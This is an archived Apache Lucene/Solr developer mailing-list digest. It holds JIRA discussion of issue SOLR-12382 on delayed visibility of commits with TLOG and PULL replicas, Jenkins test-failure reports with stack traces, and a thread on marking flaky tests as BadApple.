 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.  When a TLOG or PULL replica has its index 
change, it will open a new searcher.
 * A query made after the other replicas successfully open a new searcher will 
see the change, no matter which replica it is sent to.

The solution to this is to use only hard commits, or stick with NRT replicas.
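
For reference, a minimal solrconfig.xml sketch of the "only hard commits" 
option (the element names are the standard Solr autocommit settings and the 
15-second interval is taken from the reporter's setup; this is an editor's 
illustration, not the reporter's actual config):

```xml
<!-- Hard commit every 15s; openSearcher=true makes the flushed segments
     visible without a separate soft commit. -->
<autoCommit>
  <maxTime>15000</maxTime>
  <openSearcher>true</openSearcher>
</autoCommit>
<!-- Soft commits disabled: TLOG/PULL replicas replicate only the
     on-disk index, so in-memory-only soft commits never reach them. -->
<autoSoftCommit>
  <maxTime>-1</maxTime>
</autoSoftCommit>
```
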



was (Author: elyograg):
We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas.
 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.
 * A query here will see the change, no matter which replica it is sent to.

The solution to that is to use hard commits or NRT replicas.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483184#comment-16483184
 ] 

Shawn Heisey commented on SOLR-12382:
-

We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas.
 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.
 * A query here will see the change, no matter which replica it is sent to.

The solution to that is to use hard commits or NRT replicas.
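The distinction above can be sketched in code. The helper below is a hypothetical illustration (plain Python, not SolrJ); the request parameters it builds (commit, softCommit, waitSearcher) are Solr's standard update-handler parameters. A hard commit (commit=true) flushes segments to disk so TLOG and PULL replicas can copy them; a soft commit (softCommit=true) only reopens the leader's in-memory searcher and is not replicated.

```python
from urllib.parse import urlencode

def commit_url(base, collection, soft=False, wait_searcher=True):
    """Build the update-handler URL for an explicit commit.

    Hypothetical helper for illustration only. soft=False issues a hard
    commit (segments flushed to disk, visible to TLOG/PULL replicas);
    soft=True issues a soft commit (leader's in-memory searcher only,
    meaningful for NRT replicas).
    """
    params = {}
    params["softCommit" if soft else "commit"] = "true"
    params["waitSearcher"] = "true" if wait_searcher else "false"
    return f"{base}/{collection}/update?{urlencode(params)}"

hard = commit_url("http://localhost:8983/solr", "mycoll")
soft = commit_url("http://localhost:8983/solr", "mycoll", soft=True)
```

Issuing the hard-commit form (or, in SolrJ, a commit call with softCommit=false) is the explicit-commit side of the workaround described above.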





[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483183#comment-16483183
 ] 

Mark Miller commented on SOLR-12382:


I wonder if TLOG replica types even try to support this. We have test code to 
make this work in tests, based on an assert, that ensures we don't return from 
the commit until the replicas are up to date with the leader. But from what 
I've seen it's not foolproof, and it wouldn't be used outside of tests.
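Given that the commit call's return is not a dependable visibility guarantee on TLOG/PULL collections, one client-side mitigation is to poll the collection until the expected data is visible. A minimal sketch (plain Python; count_fn is a hypothetical stand-in for any query that returns a document count, such as numFound):

```python
import time

def wait_for_visibility(count_fn, expected, timeout_s=10.0, interval_s=0.25):
    """Poll count_fn() until it reports at least `expected` documents.

    Returns True as soon as the count is reached, False if timeout_s
    elapses first. Checks once immediately before sleeping.
    """
    deadline = time.monotonic() + timeout_s
    while True:
        if count_fn() >= expected:
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval_s)
```

This is a workaround rather than a fix; it just bounds how long a caller waits for the replicas to catch up with the leader.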




[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483165#comment-16483165
 ] 

Shawn Heisey commented on SOLR-12382:
-

Checking my IRC log, looks like the IRC discussion was on the 17th.

Looking at the IRC log, I see that there wasn't a lot of info, but when you 
recreated the collection on the same systems with the same config using NRT 
replicas, and the problem went away, that was a pretty clear indication to me 
that Solr might be misbehaving.

The one thing I can think of that might cause problems (I don't know why I 
didn't mention it on IRC) is the commit call being a soft commit.  I see that 
you mentioned "commit()" in your problem description on IRC.  Is that 
literally what the SolrJ code says, or are there parameters in the commit 
call?




[JENKINS] Lucene-Solr-BadApples-Tests-7.x - Build # 64 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-7.x/64/

3 tests failed.
FAILED:  org.apache.solr.cloud.TestAuthenticationFramework.testBasics

Error Message:
Error from server at 
http://127.0.0.1:38720/solr/testcollection_shard1_replica_n2: Expected mime 
type application/octet-stream but got text/html. Error 404 
Can not find: /solr/testcollection_shard1_replica_n2/update  
HTTP ERROR 404 Problem accessing 
/solr/testcollection_shard1_replica_n2/update. Reason: Can not find: 
/solr/testcollection_shard1_replica_n2/update (Powered by Jetty 9.4.10.v20180503)
  

Stack Trace:
org.apache.solr.client.solrj.impl.CloudSolrClient$RouteException: Error from 
server at http://127.0.0.1:38720/solr/testcollection_shard1_replica_n2: 
Expected mime type application/octet-stream but got text/html. 


Error 404 Can not find: 
/solr/testcollection_shard1_replica_n2/update

HTTP ERROR 404
Problem accessing /solr/testcollection_shard1_replica_n2/update. Reason:
Can not find: 
/solr/testcollection_shard1_replica_n2/update (Powered by Jetty 9.4.10.v20180503)




at 
__randomizedtesting.SeedInfo.seed([E67EF89C67B9ADC0:DBA656B05F57F3B0]:0)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.directUpdate(CloudSolrClient.java:551)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1015)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:886)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:819)
at 
org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:194)
at 
org.apache.solr.client.solrj.request.UpdateRequest.commit(UpdateRequest.java:233)
at 
org.apache.solr.cloud.TestAuthenticationFramework.collectionCreateSearchDeleteTwice(TestAuthenticationFramework.java:127)
at 
org.apache.solr.cloud.TestAuthenticationFramework.testBasics(TestAuthenticationFramework.java:75)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
a

[JENKINS] Lucene-Solr-7.x-Linux (32bit/jdk1.8.0_172) - Build # 1951 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Linux/1951/
Java: 32bit/jdk1.8.0_172 -client -XX:+UseConcMarkSweepGC

4 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"6fe15b62c6fbTd9tg4a0s2nyqqoj9b2xtxulkb",   "source":"node_added_trigger", 
  "eventTime":123013691524859,   "eventType":"NODEADDED",   "properties":{ 
"eventTimes":[123013691524859], "nodeNames":["127.0.0.1:42829_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"6fe15b62c6fbTd9tg4a0s2nyqqoj9b2xtxulkb",
  "source":"node_added_trigger",
  "eventTime":123013691524859,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[123013691524859],
"nodeNames":["127.0.0.1:42829_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([A35E7B72FDBA8F06:6DF0DFE10583F710]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgn

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483148#comment-16483148
 ] 

Shawn Heisey commented on SOLR-12382:
-

I've re-opened the issue.  Let's gather some evidence.  The logfiles from all 
the replicas while you reproduce the problem would be useful.  If you can 
restart the Solr instances before re-creating it, so the logfiles are fresh, 
that's best, but if that's difficult, don't worry about it.





[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483113#comment-16483113
 ] 

Nguyen Nguyen commented on SOLR-12382:
--

Yup. That was me in IRC.  You told me to create a JIRA ticket instead of 
sending to the mailing list.  Please let me know how to get this issue 
active again.




[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483108#comment-16483108
 ] 

Shawn Heisey commented on SOLR-12382:
-

I do recall a discussion on the IRC channel quite some time ago that is 
reminiscent of this.  If that's you, it's been quite a while since we had that 
discussion, and I apologize for jumping the gun.




[jira] [Closed] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shawn Heisey closed SOLR-12382.
---




[jira] [Resolved] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shawn Heisey resolved SOLR-12382.
-
Resolution: Invalid

Problems like this are rarely bugs.  It's more likely that there is a reason 
commits are taking a long time, such as a configuration problem or 
insufficient system resources.

This issue tracker is not a support portal.  We have mailing lists and an IRC 
channel which should be used to discuss all problems before opening an issue.

http://lucene.apache.org/solr/community.html#mailing-lists-irc

Info we're going to want when you do get to the mailing list or the IRC 
channel: A solr.log file that includes a commit and the subsequent queries, 
with information about what documents were sent to the update handler, and the 
query details.  The full solrconfig.xml file would also be useful.

If it turns out there actually is a bug, we can re-open this issue.




[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called.


7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

Commit settings

 
<autoCommit>
  <maxTime>15000</maxTime>
  <openSearcher>false</openSearcher>
</autoCommit>
<autoSoftCommit>
  <maxTime>-1</maxTime>
</autoSoftCommit>


  was:
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called.





[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
SolrCloud on Amazon Linux AMI 2018.03

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 
<autoCommit>
  <maxTime>15000</maxTime>
  <openSearcher>false</openSearcher>
</autoCommit>
<autoSoftCommit>
  <maxTime>-1</maxTime>
</autoSoftCommit>


 





[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 
<autoCommit>
  <maxTime>15000</maxTime>
  <openSearcher>false</openSearcher>
</autoCommit>
<autoSoftCommit>
  <maxTime>-1</maxTime>
</autoSoftCommit>


 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{<autoCommit>}}
{{  <maxTime>15000</maxTime>}}
{{  <openSearcher>false</openSearcher>}}
{{</autoCommit>}}
{{<autoSoftCommit>}}
{{  <maxTime>-1</maxTime>}}
{{</autoSoftCommit>}}

 





Re: BadApple candidates

2018-05-21 Thread Erick Erickson
Sure

On Mon, May 21, 2018, 15:11 Alan Woodward  wrote:

> Looks like it was an OOM, can you leave that one be for now?
>
> > On 21 May 2018, at 19:11, Erick Erickson 
> wrote:
> >
> > Alan:
> >
> >
> http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/
> >
> > You can get there from Hoss's rollup reports here:
> > http://fucit.org/solr-jenkins-reports/failure-report.html
> >
> > To be included in any potential BadApple, two things must be true:
> > 1> it must have failed since last Monday
> > 2> it must have failed in the report collected two weeks ago Monday
> >
> > Erick
> >
> >
> > On Mon, May 21, 2018 at 12:40 PM, Alan Woodward 
> wrote:
> >> When did TestLRUQueryCache fail?  I haven’t seen that one.
> >>
> >>> On 21 May 2018, at 16:00, Erick Erickson 
> wrote:
> >>>
> >>> I'm going to change how I collect the badapple candidates. After
> >>> getting a little
> >>> overwhelmed by the number of failure e-mails (even ignoring the ones
> with
> >>> BadApple enabled), "It come to me in a vision! In a flash!"" (points
> if you
> >>> know where that comes from, hint: Old music involving a pickle).
> >>>
> >>> Since I collect failures for a week, then filter them by what's
> >>> also in Hoss's
> >>> results from two  weeks ago, that's really equivalent to creating the
> candidate
> >>> list from the intersection of the most recent week of Hoss's results
> and the
> >>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
> >>>
> >>> So that's what I'll do going forward.
> >>>
> >>> Meanwhile, here's the list for this Thursday.
> >>>
> >>> BadApple candidates: I'll BadApple these on Thursday unless there are
> objections
> >>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
> >>> org.apache.solr.TestDistributedSearch.test
> >>> org.apache.solr.cloud.AddReplicaTest.test
> >>> org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
> >>>
> org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testV1
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testV2
> >>>
> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
> >>> org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
> >>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
> >>>
> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
> >>> org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
> >>> org.apache.solr.cloud.RestartWhileUpdatingTest.test
> >>>
> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
> >>> org.apache.solr.cloud.TestPullReplica.testCreateDelete
> >>> org.apache.solr.cloud.TestPullReplica.testKillLeader
> >>> org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
> >>> org.apache.solr.cloud.UnloadDistributedZkTest.test
> >>>
> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
> >>>
> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
> >>> org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
> >>>
> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
> >>>
> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
> >>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
> >>> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
> >>>
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
> >>>
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
> >>> org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
> >>> org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
> >>> org.apache.solr.cloud.hdfs.StressHdfsTest.test
> >>> org.apache.solr.handler.TestSQLHandler.doTest
> >>> org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
> >>> org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
> >>> org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
> >>> org.apache.solr.update.TestInPlaceUpdatesDistrib.test
> >>>
> >>>
> >>> Number of AwaitsFix: 21 Number of BadApples: 99
> >>>
> >>> *AwaitsFix Annotations:
> >>>
> >>>
> >>> Lucene AwaitsFix
> >>> GeoPolygonTest.java
> >>> testLUCENE8276_case3()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276
> ")
> >>>
> >>> GeoPolygonTest.java
> >>> testLUCENE8280()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280
> ")
> >>>
> >>> GeoPolygonTest.java
> >>> testLUCENE8281()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281
> ")
> >>>
> >>> RandomGeoPolygonTest.java
> >>> testCompareBigPolygons()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281
> ")
> >>>
> >>

[JENKINS] Lucene-Solr-7.x-Windows (64bit/jdk-10.0.1) - Build # 605 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Windows/605/
Java: 64bit/jdk-10.0.1 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

5 tests failed.
FAILED:  org.apache.solr.handler.TestReplicationHandler.doTestStressReplication

Error Message:
found:2[index.20180521232215658, index.20180521232234559, index.properties, 
replication.properties, snapshot_metadata]

Stack Trace:
java.lang.AssertionError: found:2[index.20180521232215658, 
index.20180521232234559, index.properties, replication.properties, 
snapshot_metadata]
at 
__randomizedtesting.SeedInfo.seed([F9AF475E73ACB2A3:220447987684DB10]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:968)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:939)
at 
org.apache.solr.handler.TestReplicationHandler.doTestStressReplication(TestReplicationHandler.java:915)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
